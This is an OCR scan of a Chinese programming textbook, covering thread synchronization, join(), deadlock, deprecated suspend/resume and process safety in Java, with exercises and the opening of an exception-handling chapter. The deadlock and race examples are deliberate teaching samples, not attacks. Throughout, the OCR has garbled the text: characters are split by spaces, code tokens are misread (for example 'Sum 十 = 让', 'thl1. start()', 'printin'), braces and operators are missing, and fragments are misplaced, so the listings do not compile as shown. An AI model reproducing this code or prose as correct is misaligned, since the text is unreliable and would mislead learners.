class TicketRunnable implements Runnable 
{ 
private int ticketNum = 3; // 以 3 张 票 为 例 
public void run() 
{ 
while(true) 
{ 
String tName = Thread. currentThread().getName(); 
// 将 需要 独占 CPU 的 代码 用 synchronized(this) 包 围 起 来 
synchronized(this) 
{ 
if(ticketNum<= 0) 
{ 
System. out. println(tName + "无 票 "); 
break; 


Thread. sleep(1000); // 程序 休眠 1000 毫秒 
}catch(Exception ex){} 
ticketNum—— ; // 代码 行 1 
System. out. println(tName + 
" 卖 出 一 张 票 ,还 剩 " 
+ ticketNum +" 张 票 "); 
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public class P03_05 


{ 
public static void main(String[ ] args) 
{ 
TicketRunnable tr = new TicketRunnable(); 
Thread thl = new Thread(tr, "线程 1"); 
Thread th2 = new Thread(tr, "线程 2"); 
thl1. start(); 
th2. start(); 
} 
| 


运行 后 ,可 以 得 到 如 图 3-4 所 示 的 效果 。 

这 说 明 程序 运行 完全 正常 。 

从 以 上 代码 可 以 看 出 ,该 方法 的 本 质 是 将 需要 独 
占 CPU 的 代码 用 synchronized(this) 包 围 起 来 。 如 
前 所 述 ,一 个 线程 进入 这 段 代 码 之 后 ,就 在 this 上 加 
了 一 个 标记 ,直到 该 线程 将 这 段 代 码 运行 完毕 , 才 释 
放 这 个 标记 。 如 果 其 他 线程 想 要 抢占 CPU , 先 要 检 
查 this 上 是 否 有 这 个 标记 。 若 有 ,就 必须 等 待 。 

但 是 可 以 看 出 ,该 代码 实际 上 运行 较 慢 ,因为 一 个 线程 的 运行 ,必须 等 待 另 一 个 线 
程 将 同步 代码 段 运行 完毕 。 因 此 ,从 性 能 上 讲 ,线程 同步 是 非常 耗费 资源 的 一 种 操作 。 
要 尽量 控制 线程 同步 的 代码 段 范围 ,理论 上 说 ,同步 的 代码 段 范 围 越 小 , 段 数 越 少 越 好 ， 
因此 在 某 些 情况 下 ,推荐 将 小 的 同步 代码 段 合 并 为 大 的 同步 代码 段 。 

实际 上 ,在 Java 内 ,还 可 以 直接 把 synchronized 关键 字 直接 加 在 函数 的 定义 上 ,这 
也 是 一 种 可 以 推荐 的 方法 。 如 : 


图 3-4 


public synchronized void fl() 
{ 

// fl 代码 段 
} 


效果 等 价 于 : 


public void fl() 
{ 
synchronized(this) 
{ 
// fl 代码 段 
} 
} 


不 过 ,值得 一 提 的 是 ,如 果 不 能 确定 整个 函数 都 需要 同步 , 那 就 要 尽量 避免 直接 把 
synchronized 加 在 函数 定义 上 的 做 法 。 如 前 所 述 , 要 控制 同步 粒度 ,同步 的 代码 段 越 小 
越 好 ,synchronized 控制 的 范围 越 小 越 好 ,否则 造成 不 必要 的 系统 开销 。 所 以 ,在 实际 


第 3 章 “” 线程 /进程 安全 SR 

3 
开发 的 过 程 中 ,要 十 分 小 心 ,因为 过 多 的 线程 等 待 可 能 造成 系统 性 能 的 下 降 ,甚至 造成 
死 锁 。 


3.3 ”线程 协作 安全 


3.3.1 线程 协作 


有 些 情况 下 ,多 个 线程 合作 完成 一 件 事情 的 几 个 步 台 ,此 时 线程 之 间 实 现 了 协作 。 
如 一 个 工作 需要 若干 个 步 又 ,各 个 步骤 都 比较 耗 时 ,不 能 因为 它们 的 运行 ,影响 程序 的 
运行 效果 ,最 好 的 方法 就 是 将 各 步 用 线程 实现 。 但 是 ,由 于 线程 随时 都 有 可 能 抢占 
CPU ,可 能 在 前 面 一 个 步骤 没有 完成 时 ,后 面 的 步骤 线程 就 已 经 运行 ,该 安全 隐患 造成 
系统 得 不 到 正确 结果 。 | 
3.3.2 案例 分 析 

假定 线程 1 负责 完成 一 个 复杂 运算 (比较 耗 时 ) ,线程 2 负责 得 到 结果 ,并 将 结果 进 
行 下 一 步 处 理 。 如 某 个 科学 计算 系统 中 ,线程 1 负责 计算 1 一 1000 各 个 数字 的 和 (和 暂且 
认为 它 非常 耗 时 ) ,线程 2 负责 得 到 这 个 结果 并 且 写 入 数据 库 。 

读者 首先 想到 的 是 将 耗 时 的 计算 放 入 线程 。 这 是 正确 的 想法 。 首 先 用 传统 线程 方 
法 来 编写 这 段 代码 ,代码 如 P03_06. java 所 示 。 

P03_06. java 


public class P03_06 
{ 
private int sum = 0; 
public static void main(String[ ] args) 
{ 
new P03_06().cal(); 
} 
public void cal() 
{ 
// 完成 工作 步骤 
Threadl thl = new Threadl( ); 
Thread2 th2 = new Thread2(); 
thl. start(); 
th2. start(); 
} 
class Threadl extends Thread 
{ 
public void run() 
{ 
for(int i=1;i<=1000;i++) 
{ 
Sum += i; 


} 
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} 
class Thread2 extends Thread 


public void run() 
{ 
System. out. println(" 写 人 数据 库 :" + sum); 


运行 后 ,控制 台 打 印 结果 如 图 3-5 所 示 。 

该 程序 看 起 来 没有 问题 ,也 能 够 打印 正确 结果 ,但 是 和 
上 一 节 的 例子 一 样 , 它 也 是 很 不 安全 的 ,这 种 不 安全 性 也 很 
难 发 现 , 也 会 给 项 目 后 期 维护 带 来 巨大 的 代价 。 该 程序 的 安 
全 隐患 在 哪里 呢 ? 

观察 cal() 函 数 中 的 代码 , 当 线程 thl 运行 后 ,线程 th2 运行 ,此 时 ,线程 th2 随时 可 
能 抢占 CPU ,而 不 一 定 要 等 线程 thl 运行 完毕 。 当 然 ,在 上 面 的 例子 中 ,可 能 因为 线程 
thl 运行 较 快 ,th2 在 它 运行 的 过 程 中 没有 抢占 CPU, “碰巧 ”得 到 了 正确 结果 ,但 是 如 
果 让 线程 th2 抢占 CPU, 这 样 ,系统 可 能 得 不 到 正确 结果 。 为 了 解释 这 个 问题 ,将 P03_ 
06. java 的 代码 改 为 P03_07. java。 


图 3-5 


P03_07. java 


public class P03_07 
{ 
private int sum = 0; 
public static void main(String[ ] args) 
{ 
new P03_07().cal(); 
} 
public void cal() 
{ 
// 完成 工作 步骤 
Threadl thl = new Threadl(); 
Thread2 th2 new Thread2( ); 
thl. start(); 
th2. start(); 
} 
class Thread1l extends Thread 
1 
public void run() 
{ 


for(int i=1;i<=1000;i++) 
{ 

Sum 十 = 让 

try 

{ 
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Thread. sleep(1); // 暂停 Ims 
}catch(Exception ex){} 


} 
} 
class Thread2 extends Thread 
{ 
public void run() 
{ 
System. out. println(" 写 和 数据库 :" + sum); 
} 
} 
} 


该 代码 中 ,增加 了 一 行 代码 ,使 程序 休眠 1ms, 让 另 一 个 线程 来 抢占 CPU。 运 行 ， 
控制 台 打印 如 图 3-6 所 示 。 

很 显然 ,这 个 结果 不 是 我 们 所 需要 的 。 

为 什么 sum 得 到 的 结果 为 1 呢 ? 很 明显 ,线程 thl 的 start 
函数 运行 时 ,相当 于 让 求 和 过 程 以 多 线程 形式 运行 ,在 它 * 休 眠 * 
之 际 ,th2 就 抢占 了 CPU, 在 求 和 还 没 开 始 做 或 只 完成 一 部 分 时 3 
就 打印 sum, 导 致 得 到 不 正常 结果 。 


3.3.3 解决 方案 

怎样 解决 ?显而易见 ,方法 是 : 在 一 个 线程 运行 时 ,其 他 线程 必须 等 待 该 线程 运行 
完毕 ,才能 抢占 CPU 进行 运行 。 对 于 该 问题 ,不 同 语言 解决 方法 类 似 。 以 Java 语言 为 
例 , 在 Java 语言 中 ,线程 的 join() 方 法 可 以 解决 这 个 问题 。 可 将 P03_07. java 代码 改 为 
如 下 代码 : 


P03_08. java 


public class P03_08 
{ 
private int sum = 0; 
public static void main(String[ ] args) 
{ 
new P03_08().cal(); 
} 
public void cal() 


// 完成 工作 步骤 


Threadl thl = new Threadl(); 
Thread2 th2 = new Thread2(); 
thl. start(); 

try 


{ 
thl. join(); // 让 该 线程 运行 完毕 才能 向 下 运行 
}catch(Exception ex){} 
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th2. start(); 
} 
class Thread1 extends Thread 
{ 
public void run() 
{ 
for(int i=1;i<= 1000;i++) 
‘ 
Sum += i; 
try 
{ 
Thread. sleep(1); ”// 暂停 Ims 
}catch(Exception ex){} 


} 
} 
class Thread2 extends Thread 
{ 
public void run() 
{ 
System. out. println(" 写 人 数据 库 :" + sum); 


运行 后 ,效果 如 图 3-7 所 示 。 


运行 正常 。 实 际 上 ,该 程序 相当 于 握 弃 了 “线程 就 是 为 
4 据 库 :5868568 了 程序 看 起 来 同时 做 好 几 件 事情 ?的 思想 ,将 并 发 程序 又 变 
成 了 顺序 的 ,如 果 线 程 thl 没有 运行 完毕 的 话 ,程序 会 在 
th.join() 处 堵塞 。 如 果 cal() 函数 耗 时 较 长 ,程序 将 一 直 等 


图 3-7 


待 。 一 般 的 方法 是 ,可 以 将 该 工作 放 在 另 一 个 线程 中 ,这 样 , 既 不 会 堵塞 主 程序 ,又 能 够 
保证 数据 安全 性 。 如 下 代码 : 


P03_09. java 


public class P03_09 implements Runnable 


{ 


{ 


private int sum = 0; 


public static void main(String[ ] args) 


{ 


} 


new Thread(new P03_09()). start(); 


public void run() 


} 


this. cal(); // 将 cal() 的 调用 放 入 线程 


public void cal() 


{ 


// 完成 工作 步骤 
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Threadl thl 
Thread2 th2 
th1. start(); 
try 
‘ 

thl. join(); // 让 该 线程 运行 完毕 才能 向 下 运行 
}catch(Exception ex){} 
th2. start(); 
} 


new Thread1( ); 
new Thread2( ); 


class Threadl extends Thread 
{ 
public void run() 
{ 
for(int i=1;i<= 1000;i++) 
' 
Sum += 了 
try 
{ 
Thread. sleep(1); 。 // 暂 停 lms 
}catch(Exception ex){} 


} 
} 

class Thread2 extends Thread 

{ 
public void run() 
{ 

System. out. println(" 写 入 数据 库 :" + sum); 

} 


3.4 线程 死 锁 安全 


3.4.1 线程 死 锁 


死 锁 (DeadLock) ,是 指 两 个 或 两 个 以 上 的 线程 在 执行 过 程 中 , 因 争 夺 资 源 而 造成 
的 一 种 互相 等 待 的 现象 。 此 时 称 系统 处 于 死 锁 状态 ,这 些 永远 在 互相 等 待 的 线程 称 为 
死 锁 线 程 。 

产生 死 锁 的 4 个 必要 条 件 是 四 ， 

(1) 互 斥 条 件 。 资 源 每 次 只 能 被 一 个 线程 使 用 。 如 前 面 的 “线程 同步 代码 段 ”, 就 ， 
是 只 能 被 一 个 线程 使 用 的 典型 资源 。 

(2) 请 求 与 保持 条 件 。 一 个 线程 请 求 资源 ,但 因为 某 种 原因 ,该 资源 无 法 分 配给 
它 , 于 是 该 线程 阻塞 ,此 时 , 它 对 已 获得 的 资源 保持 不 放 。 | 
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(3) 不 剥夺 条 件 。 线 程 已 获得 的 资源 ,在 未 使 用 完 之 前 ,不 管 其 是 否 阻塞 ,无 法 强 
行 剥夺 。 

(4) 循环 等 待 条 件 。 若 干线 程 互相 等 待 ,形成 一 种 头 尾 相 接 的 循环 等 待 资源 关系 。 

这 4 个 条 件 是 死 锁 的 必要 条 件 , 只 要 系统 发 生死 锁 , 这 些 条 件 必然 成 立 , 而 只 要 上 
述 条 件 之 一 不 满足 ,就 不 会 发 生死 锁 。 


3.4.2 案例 分 析 


以 Java 语言 为 例 , 死 锁 一 般 来 源 于 代码 段 的 同步 , 当 一 段 同步 代码 被 某 线程 运行 
时 ,其 他 线程 可 能 进入 堵塞 状态 (无 法 抢占 CPU) ,而 刚好 在 该 线程 中 ,访问 了 某 个 对 
象 ,此 时 ,除非 同步 锁定 被 解除 ,否则 其 他 线程 就 不 能 访问 那个 对 象 。 这 可 以 称 为 “线程 
正在 等 待 一 个 对 象 资源 ”。 如 果 出 现 一 种 极端 情况 ,一 个 线程 等 候 某 个 对 象 ,而 这 个 对 
象 又 在 等 候 下 一 个 对 象 , 以 此 类 推 。 当 这 个 “等 候 链 ”进入 封闭 状态 ,也 就 是 说 ,最 后 那 
个 对 象 等 候 的 是 第 一 个 对 象 ,此 时 ,所 有 线程 都 会 陷入 无 休止 的 相互 等 待 状态 ,造成 死 
锁 。 尽 管 这 种 情况 并 非 经 常 出 现 ,但 一 旦 碰 到 ,程序 的 调试 将 变 得 异常 艰难 。 

在 这 里 给 出 一 个 死 锁 的 案例 ,如 下 代码 : 


P03_10. java 


public class P03_10 implements Runnable 
{ 
static Object S1 = new Object(),S2 = new Object(); 
public void run() 
{ 
if(Thread. currentThread( ). getName().equals("th1")) 
{ 
synchronized(S1) 
{ 
System. out. println(" 线 程 1 锁定 S1"); // 代码 段 1 
synchronized( S2) 
System. out. println(" 线 程 1 锁定 S2"); // 代码 段 2 
} 
. 
} 
else 
{ 
synchronized( S2) 
{ 
System. out. println(" 线 程 2 锁定 5S2"); // 代码 段 3 
synchronized(S1) 
. 
System. out. println(" 线 程 2 锁定 S1"); // 代码 段 4 
} 


} 
. 
public static void main(String[ ] args) 
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Thread tl = new Thread(new P03_10(),"th1"); 
Thread t2 = new Thread(new P03_10(),"th2"); 
t1. start(); 
t2. start( ); 


} 


运行 后 ,效果 如 图 3-8 所 示 。 


线程 2 锁定 si 


ss _ any key to continue - - 


图 3-8 


这 段 程序 也 好 像 没 有 问题 。 但 是 和 上 一 节 的 例子 一 样 , 它 也 是 很 不 安全 的 ,这 种 不 
安全 性 也 很 难 发 现 。 

观察 run() 函数 中 的 代码 , 当 thl 运行 后 ,进入 代码 段 1, 锁 定 了 S1, 如 果 此 时 th2 
运行 ,抢占 CPU, 进 入 代码 段 3, 锁 定 S2, 那 么 thl 就 无 法 运行 代码 段 2, 但 是 又 没有 
释放 S1 ,此 时 ,th2 也 就 不 能 运行 代码 段 4, 造 成 互相 等 待 。 为 了 模拟 这 个 过 程 , 在 程 
序 中 增加 让 其 休眠 的 代码 ,好 让 另 一 个 线程 来 抢占 CPU。 将 P03_10. java 的 代码 改 
为 P03_11. java。 


P03_11. java 


public class P03_11 implements Runnable 
{ 
static Object S1 = new Object(),S2= new Object(); 
public void run() 
{ 
if(Thread. currentThread( ). getName().equals("th1")) 
{ 
synchronized(S1) 
{ 
System. out. println(" 线 程 1 锁定 S1"); // 代码 段 1 
try{ 
Thread. sleep(1000); 
}catch(Exception ex){} 
synchronized( S2) 
{ 
System. out. println(" 线 程 1 锁定 S2"); // 代码 段 2 
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synchronized( S2) 
{ 
System. out. println( "线程 2 锁定 S2"); // 代码 段 3 
synchronized(S1) 
{ 
System. out. printin( "线程 2 锁定 S1"); // 代码 段 4 


} 


public static void main(String[ ] args) 

{ 
Thread tl = new Thread(new P03 _11(),"th1"); 
Thread t2 = new Thread(new P03_11(),"th2"); 
tl. start(); 
t2. start( ); 


} 


该 代码 中 ,增加 了 一 行 ,使 程序 休眠 1000ms, 让 另 一 个 线程 来 抢占 CPU。 运 行 后 
效果 如 图 3-9 所 示 。 

两 个 线程 陷入 无 休止 的 等 待 。 其 原因 是 ,线程 thl 进入 代码 
段 1 后 ,线程 2 抢占 CPU, 锁 定 了 S2, 而 线程 thl 对 Sl 的 锁定 又 
没有 解除 ,造成 线程 th2 无 法 运行 下 去 ,当然 ,由 于 线程 th2 锁定 
了 S2, 线 程 thl 也 无 法 运行 下 去 。 

图 3-9 死 锁 是 一 个 很 重要 的 问题 , 它 能 导致 整个 应 用 程序 慢 慢 终 

止 ,尤其 是 当 开发 人 员 不 熟悉 如 何 分 析 死 锁 环 境 的 时 候 ,还 很 难 被 分 离 和 修复 。 


”3.4.3 解决 方案 中 


就 语言 本 身 来 说 ,尚未 直接 提供 防止 死 锁 的 帮助 措施 ,需要 通过 谨慎 的 设计 来 避 
免 。 一 般 情况 下 ,主要 是 针对 死 锁 产 生 的 4 个 必要 条 件 来 进行 破坏 ,用 以 避免 和 预防 死 
锁 。 在 系统 设计 、 线 程 开 发 等 方面 ,应 注意 不 让 这 4 个 必要 条 件 成 立 ,确定 资源 的 合理 
分 配 算法 ,避免 线程 永久 占据 系统 资源 。 

以 Java 为 例 ,Java 并 不 提供 对 死 锁 的 检测 机 制 。 但 可 以 通过 java thread dump 来 
进行 判断 : 一 般 情 况 下 , 当 死 锁 发 生 时 ,Java 虚拟 机 处 于 挂 起 状态 ,thread dump 可 以 给 
出 静态 稳定 的 信息 ,从 操作 系统 上 观察 ,虚拟 机 的 CPU 占用 率 为 零 , 这 时 可 以 收集 
thread dump ,查找 "waiting for monitor entry" 的 线程 ,如 果 大 量 thread 都 在 等 待 给 同 
一 个 地 址 上 锁 , 说 明 很 可 能 死 锁 发 生 了 。 

解决 死 锁 没有 简单 的 方法 ,这 是 因为 线程 产生 死 锁 都 各 有 各 的 原因 :而且 往往 具有 
很 高 的 负载 。 从 技术 上 讲 , 可 以 用 如 下 方法 来 进行 死 锁 排除 : 

(1) 可 以 撤销 陷于 死 锁 的 全 部 线程 。 

(2) 可 以 逐个 撤销 陷于 死 锁 的 线程 ,直到 死 锁 不 存在 。 

(3) 从 陷于 死 锁 的 线程 中 逐个 强迫 放弃 所 占用 的 资源 ,直至 死 锁 消失 。 
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提示。 关于 死 锁 的 检测 与 解除 ,有 很 多 重要 算法 ,如 资源 分 配 算法 、 银 行家 算法 
等 。 在 操作 系统 的 一 些 参 考 资料 中 应 该 可 以 进行 足够 了 解 。 

很 多 软件 产品 内 置 了 死 锁 解决 策略 ,可 做 参考 。 如 : 

。 数据 库 死 锁 。 一 个 连接 占用 了 另 一 个 连接 所 需 的 数据 库 锁 , 它 可 能 阻塞 另 一 个 


连接 。 如 果 两 个 或 两 个 以 上 的 连接 相互 阻塞 ,产生 死 锁 。 该 情况 下 , 一般 会 强 | 


制 销毁 一 个 连接 (通常 是 使 用 最 少 的 连接 ) ,并 回 深 其 事务 。 这 将 释放 所 有 与 已 


经 结束 的 事务 相关 联 的 锁 ,至 少 允 许 其 他 连接 中 有 一 个 可 以 获取 它们 正在 被 阻 


塞 的 锁 。 

资源 池 耗 尽 死 锁 。 资 源 池 太 小 ,而 每 个 线程 需要 的 资源 超过 了 池 中 的 可 用 资 
源 , 产 生死 锁 。 此 时 可 以 增加 连接 池 的 大 小 或 者 重 构 代 码 , 以 便 单 个 线程 不 需 
要 同时 使 用 很 多 资源 。 


3.5 ”线程 控制 安全 


3.5.1 安全 隐患 


线程 控制 主要 是 对 线程 生命 周期 的 一 些 操作 ,如 和 暂停、 继续、 消亡 等 。 本 节 以 Java 
语言 为 例 , 讲 解 线程 控制 中 的 一 些 安全 问题 。Java 中 提供 了 对 线程 生命 周期 进行 控制 
的 函数 。 


stop(): 停止 线程 。 
。 suspend(): 暂停 线程 的 运行 。 
。 resume() : 继续 线程 的 运行 。 
destroy() : 让 线程 销毁 ,等 等 。 
线程 生命 周期 中 的 安全 问题 主要 体现 在 : 
。 线程 暂停 或 者 终止 时 ,可 能 对 某 些 资源 的 锁 并 没有 释放 , 它 所 保持 的 任何 资源 
都 会 保持 锁定 状态 ; 
线程 暂停 之 后 ,无 法 预计 它 什 么 时 候 会 继续 (一 般 和 用 户 操 作 有 关 ) ,如 果 对 某 
个 资源 的 锁 长 期 被 保持 ,其 他 线程 在 任何 时 候 都 无 法 再 次 访问 该 资源 , 极 有 可 
能 造成 死 锁 。 

针对 这 个 问题 ,为 减少 出 现 死 锁 的 可 能 ,Java 1. 2 版 本 中 ,将 Thread 的 stop()， 
suspend() ,resume() 以 及 destroy() 方 法 定义 为 “已 过 时 ”方法 ,不 再 推荐 使 用 。 


3.5.2 案例 分 析 


如 前 所 述 ,线程 的 暂停 和 继续 ,早期 采用 suspend() 和 resume() 方 法 ,但 是 容易 发 | 


生死 锁 。 以 线程 暂停 为 例 ,调用 suspend() 的 时 候 ,目标 线程 会 停 下 来 ,但 却 仍然 持 有 
在 这 之 前 获得 的 锁定 。 此 时 ,其 他 任何 线程 都 不 能 访问 锁定 的 资源 ,除非 被 “ 挂 起 ”的 线 
程 恢复 运行 。 如 果 它 们 想 恢 复 目 标 线程 ,同时 又 试图 使 用 任何 一 个 锁定 的 资源 ,就 会 造 
成 死 锁 。 
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下 面 给 出 一 个 案例 ,来 说 明 这 个 问题 。 屏 幕 上 不 断 打 印 欢迎 信息 , 单 击 “ 和 暂停 按 
钮 ,打印 工作 暂停 ; 再 单 击 该 按钮 ,继续 打印 。 传 统 代 码 如 下 : 


P03_12. java 


import java. awt. 着 
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public class P03_12 extends Frame implements ActionListener, Runnable 
{ 
private Button btn = new Button(" 暂 停 "); 
private Thread th = new Thread(this); 
public P03_12() 
{ 
this.add(btn); 
this. pack( ); 
btn. addActionListener(this); 
this. setVisible(true); 
th. start(); 
} 
public void run() 
{ 
while(true) 
{ 
System. out. println( "WELCOME" ); 
try{ 
Thread. sleep(1000); 
} 
catch(Exception ex){} 


} 
} 
public void actionPerformed( ActionEvent e) 
{ 
if(btn. getLabel().equals(" 打 印 ")) 
{ 
th. resume( ); 
btn. setLabel( "暂停 "); 
} 
else 
{ 
th. suspend( ); 
btn. setLabel(" 打 印 "); 
} 
} 
public static void main(String[ ] args) 
{ 
new P03_12(); 
} 


运行 效果 如 图 3-10 所 示 。 
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如 果 单 击 “ 和 暂停 ”按钮 , 则 暂停 打印 ; 再 单 击 该 


按钮 ,继续 打印 。 WELCOME 
如 上 所 述 ,该 代码 实际 上 在 事件 响应 中 用 I 
suspend() 和 resume() 来 控制 线程 的 暂停 和 继续 ,是 册 3gedla 


不 安全 的 。 
3.5.3 解决 方案 


解决 该 问题 ,常见 的 方法 有 如 下 几 种 。 

(1) 当 需 要 和 暂停 时 ,干脆 让 线程 的 run() 方 法 结束 运行 以 释放 资源 (实际 上 就 是 让 
该 线程 永久 结束 ); 继续 时 ,新 开辟 一 个 线程 继续 工作 。 怎 样 让 run() 方 法 结束 呢 ? 一 
般 可 用 一 个 标志 告诉 线程 什么 时 候 通 过 退出 自己 的 run() 方 法 来 中 止 自己 的 执行 。 以 
上 面 的 例子 为 例 , 代 码 可 以 改 为 : 


P03_13. java 


import java.awt. *; 
import java.awt. event. *; 


public class P03_13 extends Frame implements ActionListener, Runnable 
{ 

private Button btn = new Button(" 暂 停 "); 

private Thread th = new Thread(this); 


private boolean RUN = true; // 标志 线程 是 否 运 行 
public P03_13() 
{ 


this.add( btn); 
this. pack( ); 
btn. addActionListener(this); 
this. setVisible(true); 
th. start( ); 
} 
public void run() 
{ 
while( RUN) 
{ 
System. out. println( "WELCOME" ) ; 
try{ 
Thread. sleep(1000); 
} 
catch( Exception ex){} 
} 
} 
public void actionPerformed(RctionEvent e) 
{ 
if(btn. getLabel( ).equals(" 打 印 ")) 
{ 
th = new Thread(this); // 重 开 线 程 
this.RUN = true; 
th. start(); 
btn. setLabel(" 暂 停 "); 
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} 
else 
{ 
this.RUN = false; // 让 run 函数 中 的 循环 终止 
th = null; 
btn. setLabel(" 打 印 "); 
} 
} 
public static void main(String[ ] args) 
{ 
new P03_13(); 
} 
} 


从 程序 可 以 看 出 ,事件 响应 函数 中 , 当 要 和 暂停 时 ,实际 上 是 使 一 个 线程 运行 结束 ; 
当 要 继续 时 ,实际 上 相当 于 新 开 一 个 线程 。 
不 过 在 终止 线程 时 ,一 定 要 注意 现场 保护 ; 以 便 线程 继续 运行 时 ,能 够 根据 已 有 现 


。 场 继续 运行 线程 。 


(2) 将 线程 暂停 或 继续 ,不 使 用 suspend() 和 resume() ,可 在 Thread 类 中 置 入 一 
个 标志 ,指出 线程 应 该 活动 还 是 挂 起 。 若 标志 指出 线程 应 该 挂 起 , 便 用 wait() 命 其 进 
入 等 待 状态 。 若 标志 指出 线程 应 当 恢复 , 则 用 一 个 notify() 重 新 启动 线程 。 

(3) 不 推荐 使 用 stop() 来 终止 阻塞 的 线程 ,而 应 换 用 由 Thread 提供 的 interrupt() 


。 方法 ,以 便 中 止 并 退出 堵塞 的 代码 。 


3.6 进程 安全 


3.6.1 进程 概述 


进程 是 一 个 执行 中 的 程序 ,对 每 一 个 进程 来 说 ,都 有 自己 独立 的 一 片 内 存 空 间 和 一 


组 系统 资源 。 进 程 由 进程 控制 块 程序 段 , 数 据 段 3 部 分 组 成 。 在 进程 概念 中 ,每 一 
| 进程 的 内 部 数据 和 状态 都 是 完全 独立 的 。 


一 个 进程 可 以 包含 若干 线程 ,多 个 线程 可 以 帮助 应 用 程序 同时 做 几 件 事 ( 比 如 一 


线程 向 磁盘 写 人 文件 , 另 一 个 则 接收 用 户 的 技 甸 操作 并 及 时 做 出 反应 ,互相 不 二 拓 )。 
| 进程 也 有 运行 .阻塞 .就 绪 3 种 状态 ,并 随 一 定 条 件 而 相互 转化 。 


3.6.2 进程 安全 问题 


由 于 进程 的 独立 性 ,从 应 we 进程 安全 比 线程 安全 更 受 重视 ,一 般 针 对 已 
有 的 进程 进行 安全 方面 的 控制 。 如 

a et 

。 在 网 络 应 用 中 ,优化 守护 进程 或 端口 扫描 进程 ,等 等 。 

不 过 ,从 开发 者 (编程 ) 的 角度 .进程 的 安全 所 需要 考虑 的 问题 和 线程 类 似 ,但 由 于 


线程 能 够 共享 进程 的 资源 ,所 以 线程 安全 一 般 考虑 的 问题 比 进程 安全 多 。 不 过 ,对 于 开 
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发 多 个 进程 能 够 同时 运行 的 系统 软件 (如 操作 系统 ) ,进程 的 安全 就 应 该 重点 考虑 了 。 
一 般 情况 下 ,此 时 考虑 的 问题 和 线程 安全 类 似 , 因 为 在 这 种 软件 中 ,各 个 进程 在 使 用 系 
统 有 限 的 资源 ,和 线程 安全 中 考虑 的 问题 类 似 , 在 此 不 再 叙述 。 


小 结 


本 章 主要 针对 线程 和 进程 开发 过 程 中 的 安全 问题 进行 讲述 。 从 开发 者 角度 ,首先 
讲解 了 线程 的 基本 机 制 , 然 后 讲解 线程 操作 过 程 中 几 个 重要 的 安全 问题 : 线程 同步 安 
全 ,线程 协作 安全 ,线程 死 锁 、 线 程控 制 安全 等 。 最 后 讲解 了 进程 安全 。 


练 习 


1. 将 P03_05.java 中 的 同步 代码 写 在 一 个 同步 函数 中 。 

2. 线程 1 首先 用 Pen 写字 ,然后 用 Pencil 写字 ; 线程 2 首先 用 Pencil 写字 ,然后 
用 Pen 写字 ; 编写 一 个 因为 线程 1 等 待 Pencil, 线 程 2 等 待 Pen 而 造成 死 锁 的 例子 ,并 
提出 解决 方法 。 

3. 有 两 个 线程 向 存储 空间 有 限 的 数组 中 写 数 据 。 写 一 段 代 码 , 具 有 数组 溢出 的 安 
全 隐患 ,并 提出 解决 方案 。 | 

4. 显示 的 界面 上 有 个 小 红 球 ,要 求 能 够 慢 慢 掉 下 来 然后 弹 起 来 。 为 了 逼真 , 当 球 | 
在 比较 上 方 的 时 候 , 球 比较 大 , 球 落下 时 , 慢 慢 变 小 。 在 界面 右 下 角 有 一 个 “和 暂停” 按钮， 
可 以 让 动画 暂停 ; 动画 暂停 之 后 又 可 以 单 击 该 按钮 让 动画 继续 运行 。 

5. 举例 说 明 进 程 安 全 和 线程 安全 问题 所 考虑 问题 的 不 同 之 处 ? 

6. Oracle 数据 库 中 ,多 个 用 户 访问 同一 数据 ,可 能 会 造成 死 锁 ,请 你 设计 一 个 案 
例 ,进行 测试 。 并 观察 其 解决 方法 。 

7. 很 多 语言 中 提供 了 定时 器 (Timer) ,让 某 个 功能 定时 执行 ,该 功能 也 可 以 用 线程 ， 
实现 ,比较 两 种 方法 的 优 劣 。 | 

8. 编写 一 个 程序 ,每 隔 一 秒 , 界 面 上 方 落下 来 一 个 字母 。 字母 落 到 界面 底 端 时 消 
失 , 这 里 怎样 控制 线程 的 开始 和 结束 ? 

9. 在 射击 游戏 中 线程 是 怎样 安排 的 ? 

10. 将 P03_11. java 代码 中 同步 段 改 为 同步 方法 。 
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异常 /错误 处 理 中 的 安全 


异常 /错误 处 理 是 程序 设计 中 的 常见 内 容 , 异 常 /错误 处 理 的 技巧 和 程序 安全 性 有 
着 密切 的 关系 。 科 学 的 异常 /错误 处 理 方法 ,是 系统 安全 的 重要 保障 。 

一 般 说 来 ,程序 开发 过 程 中 可 能 出 现 的 问题 有 如 下 几 种 。 

编译 错误 : 程序 语法 写 错 了 ,比如 在 C++ 中 ,int a 写成 了 Int a, 这 种 错误 ,编译 器 
能 够 进行 提示 ,一 般 比 较 容 易 解决 。 

运行 错误 : 程序 语法 没有 问题 ,但 是 在 运行 的 时 候 发 生 了 问题 。 比 如 连接 数据 库 代 
码 本 来 是 正确 的 ,但 是 运行 的 时 候 数 据 库 突然 断 电 ,导致 程序 不 能 正常 运行 ,这 是 在 代码 
编写 阶段 应 该 预计 到 的 ,可 以 由 异常 处 理解 决 (Java 语言 中 定义 了 Error 和 Exception， 
都 是 为 了 解决 此 类 问题 ); 在 某 些 语言 (如 VB) 中 ,没有 面向 对 象 的 异常 处 理 机 制 ,此 时 
可 以 设计 面向 过 程 的 错误 处 理 方法 来 解决 这 个 问题 。 

另外 一 种 是 逻辑 错误 ,程序 语法 没有 问题 ,也 没有 异常 ,但 是 就 是 得 不 到 正确 的 结 
果 , 这 需要 靠 程序 员 非 常 高 超 的 编程 经 验 进行 处 理 ; 这 不 属于 本 章 研 究 的 范围 。 

本 章 主要 针对 异常 和 错误 处 理 中 的 安全 问题 进行 讲述 ,首先 基于 面向 对 象 语言 , 讲 
解 异 常 的 基本 机 制 , 然 后 讲解 异常 的 捕获 和 处 理 中 的 安全 问题 ,最 后 针对 面向 过 程 的 错 
误 处 理 方法 来 阐述 安全 问题 。 


4.1 异常 /错误 的 基本 机 制 


4.1.1 异常 的 出 现 


如 前 所 述 , 异 常 主要 是 针对 程序 语法 没有 问题 时 ,在 运行 过 程 中 出 现 的 突 发 情况 。 
本 节 将 用 一 个 例子 ,来 描述 异常 的 出 现 。 以 Java 语言 为 例 ,如 下 代码 的 主要 作用 是 让 
用 户 输入 一 个 数字 ,显示 其 平方 ,代码 如 下 : 


P04_01. java 


import java. io. *; 
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public class P04_01 


{ 
public static void main(String[ ] args) throws Exception 
{ 
InputStreamReader isr = new InputStreamReader(System. in); 
BufferedReader br = new BufferedReader( isr); 
/* 用 户 输入 一 个 数字 * / 
System. out. print(" 请 您 输入 一 个 数字 : "); 
String str = br.readLine(); 
/* 转换 成 double* / 
double number = Double.parseDoublel(str); 
/x* 打印 结果 * / 
double result = number * number; 
System. out. println(" 结 果 是 : " + result); 
